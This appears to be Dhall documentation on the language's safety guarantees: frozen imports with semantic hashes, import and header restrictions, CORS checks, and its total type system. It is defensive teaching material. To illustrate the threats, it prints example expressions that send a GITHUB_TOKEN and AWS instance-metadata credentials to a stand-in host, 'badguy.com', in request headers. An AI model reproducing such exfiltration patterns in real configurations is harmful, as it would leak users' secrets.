Safety Guarantees
Study how Dhall configuration files provide programming language features without sacrificing safety
The Dhall configuration language is designed to be programmable without sacrificing safety. This section explains in detail what safety guarantees the language provides for security-conscious people comparing Dhall to other configuration alternatives.
This section assumes some familiarity with the language. If you haven’t tried Dhall yet then a good starting point is Dhall’s JSON integration.
Effects
A programmable configuration language is a configuration language that provides tools to reduce repetition. Some configuration file formats use existing programming languages for this purpose, such as:
webpack - A tool for bundling assets that can use multiple languages (such as TypeScript) to configure its behavior
django - A web framework that uses Python as the configuration language
sbt - A Scala build tool which is also configured via the Scala programming language
These fully featured programming languages lie at one extreme of the power spectrum: they provide great flexibility, but you cannot safely run untrusted code. Such configuration files could delete files or exfiltrate sensitive data because the configuration language supports arbitrary effects. You can’t know for sure whether the configuration file is safe unless you either trust or audit the code (and auditing a Turing-complete language is difficult).
A programmable configuration language can protect against this by evaluating code within a secure sandbox that only permits a blessed set of effects. For example, the Dhall language is not a general purpose language and only supports three ways to interact with the outside world, all of which are related to importing Dhall expressions from external sources:
Importing expressions from a file path (absolute, relative, or home-anchored)
Importing expressions using an HTTP/HTTPS request to a web service
Importing expressions from an environment variable
Other than importing values, a Dhall configuration file only computes a pure value used to configure some larger program. The only other interactions with the outside world are mediated through that larger program.
Code injection
The following configuration file is a valid Dhall expression that:
imports a
concatSep
function from a web serviceimports the user’s name from the
USER
environment variableimports a type from a relative file located at
./schema.dhall
let concatSep = https://prelude.dhall-lang.org/Text/concatSep
in { name = env:USER as Text
, age = 23
, hobbies = concatSep ", " [ "piano", "reading", "skiing" ]
}
: ./schema.dhall
Normally importing values from external sources is potentially unsafe, especially if imported from a web service. An untrusted web service could inject unexpected code into your configuration by serving a new expression when you’re not looking.
Dhall provides two complementary features to secure expressions imported from untrusted sources:
You can “freeze” the imported expression, pinning its value with a cryptographic hash
You can audit any expression by eliminating all indirection
To illustrate this, suppose that you are authoring the above code and depending
on the imported concatSep
function for the first time. The first step is to
retrieve and hash the imported expression:
$ dhall hash <<< 'https://prelude.dhall-lang.org/Text/concatSep'
sha256:fa909c0b2fd4f9edb46df7ff72ae105ad0bd0ae00baa7fe53b0e43863f9bd34a
This hash can then be used to refer to this specific version of the expression; using the
command-line interpreter named dhall
, one can retrieve, type-check, and remove all
indirection in the expression, like this:
$ dhall --annotate <<< 'https://prelude.dhall-lang.org/Text/concatSep sha256:fa909c0b2fd4f9edb46df7ff72ae105ad0bd0ae00baa7fe53b0e43863f9bd34a'
( λ(separator : Text) →
λ(elements : List Text) →
merge
{ Empty = "", NonEmpty = λ(result : Text) → result }
( List/fold
Text
elements
< Empty | NonEmpty : Text >
( λ(element : Text) →
λ(status : < Empty | NonEmpty : Text >) →
merge
{ Empty = < Empty | NonEmpty : Text >.NonEmpty element
, NonEmpty =
λ(result : Text) →
< Empty | NonEmpty : Text >.NonEmpty
"${element}${separator}${result}"
}
status
)
< Empty | NonEmpty : Text >.Empty
)
)
: ∀(separator : Text) → ∀(elements : List Text) → Text
The --annotate
flag adds a type annotation to the end of the expression,
which summarizes what the function does:
: ∀(separator : Text) → ∀(elements : List Text) → Text
The expression preceding the type annotation is the “normal form” of the expression (i.e. the expression with all indirection removed). This indirection-free normal form is what you audit when examining untrusted code. Every Dhall expression has a canonical normal form because the Dhall configuration language is not Turing-complete.
Now that we have reviewed the concatSep
function, we can pin its import (using the hash we already computed) and ensure that it is the same as the expression we audited:
let concatSep =
https://prelude.dhall-lang.org/Prelude/Text/concatSep sha256:fa909c0b2fd4f9edb46df7ff72ae105ad0bd0ae00baa7fe53b0e43863f9bd34a
in { name = env:USER as Text
, age = 23
, hobbies = concatSep ", " [ "piano", "reading", "skiing" ]
}
: ./schema.dhall
You can also automatically freeze all imports within a file using the following command:
$ dhall freeze ./example.dhall
An import frozen in this way can never successfully return a different
expression. If the above URL tried to serve a new expression then the integrity
check would fail and the interpreter would reject the configuration file. This
means that a malicious actor would not be able to modify the behavior of our
program by serving a new concatSep
function with the same type but different
behavior. The worst they can do is cause the program to fail loudly if they
tamper with the import in any way.
The integrity check is not a hash of the text of the import because the textual
payload of an import does not uniquely determine the import’s meaning. To see
why, suppose that the following contrived configuration file imports a boolean
value from another file named ./bool.dhall
, like this:
[ True, ./bool.dhall ]
… and the ./bool.dhall
file contains yet another reference to file named
./number.dhall
:
-- ./bool.dhall
Natural/even ./number.dhall
… where ./number.dhall
might contain:
-- ./number.dhall
4
We cannot protect the ./bool.dhall
import using a textual hash of the file
because the configuration file’s result could still change if we modify the
./number.dhall
file to store a new value (like 5
). Modifications to
./number.dhall
would go undetected because they would not disturb the textual
hash of ./bool.dhall
.
Dhall’s integrity checks are “semantic” integrity checks, meaning that they are hashes of an expression’s normal form. This ensures that any change to an expression (even via transitive dependencies) will be detected and rejected by the integrity check. As a bonus, the semantic integrity check does not reject behavior-preserving changes so refactoring code or adding/removing whitespace/comments won’t disturb the hash.
Cross-site scripting (XSS)
One potential security breach would be using Dhall’s import system to leak information about your environment or exfiltrate data to an untrusted source.
Revisiting our previous example:
let concatSep =
https://prelude.dhall-lang.org/Prelude/Text/concatSep sha256:fa909c0b2fd4f9edb46df7ff72ae105ad0bd0ae00baa7fe53b0e43863f9bd34a
in { name = env:USER as Text
, age = 23
, hobbies = concatSep ", " [ "piano", "reading", "skiing" ]
}
: ./schema.dhall
… the host at https://prelude.dhall-lang.org
would be able to detect the first
time we interpret our Dhall program by detecting an HTTP request for
https://prelude.dhall-lang.org/Prelude/Text/concatSep
. Leaking the
presence of an HTTP request at least once is unavoidable if you do not control the
web service hosting the URL. However, when you protect an import with a semantic
integrity check the import is permanently locally cached after the first request,
so subsequent imports will no longer make outbound HTTP requests.
Another potential attack vector is Dhall’s support for custom HTTP/HTTPS headers. For example, you can import Dhall expressions from private GitHub repositories by authorizing the request with a secure token, like this:
https://raw.githubusercontent.com/yourCompany/somePrivateRepository/master/someExpression.dhall
using [ { header = "Authorization", value = "token ${env:GITHUB_TOKEN as Text}" } ]
-- The above line authorize the request
This would be dangerous if a malicious Dhall expression that you imported tried to exfiltrate sensitive files or credentials through an HTTPS request to a web service they control with data stuffed in custom headers. This would be the the closest Dhall analog to a cross-site scripting (XSS) attack.
Dhall protects against leaking sensitive files and environment variables by restricting transitive imports of remote expressions. Specifically, expressions imported from a web service can only transitively import expressions from other web services and they cannot import expressions from your local files or your environment variables.
This means that if an attacker tried to steal your GITHUB_TOKEN
by hosting the
following malicious expressions:
-- https://badguy.com/pleaseImportMe.dhall
https://badguy.com/iRecordHeaders.dhall
using [ { header = "Authorization", value = "token ${env:GITHUB_TOKEN as Text}" } ]
… then Dhall interpreter would reject any attempt to import
https://badguy.com/pleaseImportMe.dhall
because this expression imported
from a web service indirectly requested access to your GITHUB_TOKEN
environment variable.
The Dhall language also does not allow “computed imports” (i.e. imports where the import path depends on a value within the configuration file). This prevents information from being leaked through the requested path. Similarly, the language does not permit conditional importing of values. The interpreter is “strict” and always resolves imports regardless of whether the imported expressions are used. Therefore, the set of imports your program fetches cannot be used to leak program state. At most the imports will reveal what you have not yet locally cached, but nothing else.
Same origin policy
Dhall expressions imported from a web service can reference other expressions
hosted at the same domain via relative imports. For example, if you import an
expression from example.com
, like this:
https://example.com/list.dhall
… and the expression hosted there is:
[ 1, 2, ./natural.dhall ]
… then the interpreter will expand ./natural.dhall
to
https://example.com/natural.dhall
. This feature allows expressions with
relative imports to continue to function when hosted from a web service.
However, this feature also requires support for automatically forwarding any custom headers to expressions imported via relative imports. For example, if you import an expression from a private GitHub repository, like this:
https://raw.githubusercontent.com/yourCompany/somePrivateRepository/master/someExpression.dhall
using [ { header = "Authorization", value = "token ${env:GITHUB_TOKEN as Text}" } ]
… and https://.../someExpression.dhall
contains a relative import of
./anotherExpression.dhall
then:
the interpreter will canonicalize the relative import
./anotherExpression.dhall
to the fully qualified importhttps://raw.githubusercontent.com/yourCompany/somePrivateRepository/master/anotherExpression.dhall
the interpreter will make an HTTPS request for
https://raw.githubusercontent.com/yourCompany/somePrivateRepository/master/anotherExpression.dhall
using the sameAuthorization
header containing the user’s GitHub API token
This is the Dhall version of the “same origin policy”. Dhall expressions hosted within a domain can reuse headers that were supplied for any other expression residing in the same domain. This feature allows expressions with relative imports to continue to function when protected by a service that requires authorization.
Imported expressions cannot transfer sensitive headers in this way to other domains. Custom headers are only transferred for relative imports, which can only reference expressions from the same domain. The only way for an expression imported from one domain to import an expression from a different domain is through a non-relative fully qualified import to that other domain. Such a fully qualified import to another domain resets the headers, preventing them from leaking across domains.
Server-side request forgery
What if you imported an expression from https://badguy.com/pleaseImportMe.dhall
which
contained the following contents:
https://badguy.com/iRecordHeaders.dhall
using
[ { header = "Credentials"
, value = http://169.254.169.254/latest/meta-data/iam/security-credentials/role as Text
}
]
This would be an example of “server-side request forgery”, which attempts to trick the client into making an unexpected request for sensitive data on behalf of the malicious server. The above URL is a sensitive endpoint that AWS EC2 instances can use to obtain sensitive security credentials but the endpoint is not meant to be publicly available.
The language protects against by providing built-in support for
Cross-origin resource sharing (CORS),
so that transitive imports must opt in to answering transitive requests made on
a client’s behalf. This protection blocks the above exploit because the
interpreter will check if a transitive import like
http://169.254.169.254/latest/meta-data/iam/security-credentials/role
supports CORS (it does not) and will therefore reject the request.
Types
Not all programmable configuration files use general-purpose languages. Some of them use languages designed specifically for program configuration, such as:
Jsonnet - JSON extended with programming language features
Sass - CSS extended with programming language features
HCL - JSON-compatible programmable configuration language
These languages sacrifice some power in exchange for additional safety. Similar to Dhall, these languages all provide programming features while restricting the set of allowed effects, usually limited to importing/including other files.
However, we’d like to provide additional safety guarantees beyond just limiting effects. We also want to be able to validate the correctness of configuration files before running the program that they configure.
Usually programmers validate their configuration files ahead-of-time when:
Reliability matters
As Dan Luu explains:
Configuration bugs, not code bugs, are the most common cause I’ve seen of really bad outages. When I looked at publicly available postmortems, searching for “global outage postmortem” returned about 50% outages caused by configuration changes. Publicly available postmortems aren’t a representative sample of all outages, but a random sampling of postmortem databases also reveals that config changes are responsible for a disproportionate fraction of extremely bad outages. As with error handling, I’m often told that it’s obvious that config changes are scary, but it’s not so obvious that most companies test and stage config changes like they do code changes.
Testing the program wastes computational resources
Example: You are running an expensive analytics job and you don’t want to launch hundreds of nodes only to discover that there is a typo in your job’s configuration file
The development feedback loop is slow
Example: You are configuring a program that takes a long time to compile or run the full suite of tests
The program is run non-interactively
Example: You are configuring a program that runs periodically and you don’t want to be paged on nights or weekends when the program fails on unexpected input
Non-programmable configuration file formats (like JSON) usually support ahead-of-time validation through support for schemas (like JSON schema). However, programmable configuration languages usually don’t support ahead-of-time validation because the programming analog of a schema is a type system and most of these languages lack a type system.
Dhall’s type system guarantees that if a Dhall configuration file type checks then program evaluation/normalization will never fail. Specifically, a Dhall configuration file will never:
throw an exception
crash or segfault
accept malformed input
produce malformed output
hang or time out
Dhall’s strict type system allows you to rule out all of the above failure modes ahead-of-time before loading the configuration file into any program.
Turing-completeness
Dhall is not a Turing-complete programming language, which is why Dhall’s type system can provide safety guarantees on par with non-programmable configuration file formats. Specifically, Dhall is a “total” functional programming language, which means that:
You can always type-check an expression in a finite amount of time
If an expression type-checks then evaluating that expression always succeeds in a finite amount of time
Note that a “finite amount of time” can still be very long. For example, there are some short pathological programs that take longer than the heat death of the universe to evaluate. The main benefit of evaluation being finite is not to eliminate long-running programs but to make them significantly less probable. In practice, you will discover that you will rarely author a configuration file that takes a long time to evaluate by accident.
For example, Dhall does not provide language support for recursion. If you try
to define a recursive expression or function you will get a type error. Lists
are the only recursive data structure and the only way to build or consume
lists is through safe primitives guaranteed to terminate, like List/fold
.
This restrictive programming style keeps code simple and makes expensive code
more obvious (both to the code author and reviewer).
Handling program failure
Just because a computation succeeds does not mean that the computation will return a useful result. For example, the following expression succeeds, but returns an empty value:
$ dhall <<< 'List/head Natural ([] : List Natural)'
None Natural
This is because List/head
returns an Optional
result which will be empty
if the input list is empty.
“Success” has a specific meaning in a total functional programming language. In this context, “success” means that a potentially empty or failed result is not allowed where the type system expects a successful result. Also, everything is present by default: you have to explicitly opt in to handling potentially empty or failed values.
For example, you can add any two Natural
numbers using the +
operator:
$ dhall <<< '2 + 3'
5
… but you can not add an Optional Natural
number to a Natural
number.
You will get a type error if you try to do so, such as in the following
anonymous function:
\(x : Optional Natural) -> x + 3 -- Type error
This is automatically an error even if you have not yet called the function with any argument. The type system rejects the function definition even in isolation.
You have to explicitly modify the function to handle the Optional
input by
specifying what do to if the value is absent, typically by using merge
:
\(o : Optional Natural) ->
-- Default `x` to `0` if `x` is absent
let x = merge { None = 0, Some = \(n : Natural) -> n } o
in x + 3
This benefit also applies to your configuration file’s schema. If your program expects a configuration file of type:
{ name : Text
, age : Natural
, hobbies : Text
}
… then the type system guarantees that none of those values will be absent
since every type (such as Natural
or Text
) is automatically non-Optional
by default. Your configuration file has to explicitly opt in to accepting
empty or otherwise failed values and the type system then polices your input
for you.
Conclusions
This tutorial compares Dhall to other configuration languages along multiple dimensions because the safety features that are relevant will depend on the comparison. You might care more about the absence of unrestricted effects when comparing to a general-purpose programming language whereas you might care more about the type system when comparing to a special-purpose configuration language.
Keep in mind that there is no single feature that makes a language safe in absolute terms. Safety is a function of your project requirements and threat model. In many cases you can’t be perfectly safe, but you also don’t have to be needlessly unsafe. To make an analogy, just because seatbelts don’t prevent all fatalities doesn’t mean that you shouldn’t wear them.
If you have additional questions about safety concerns or requirements not covered in this tutorial, open an issue in this repository requesting an expansion to this document.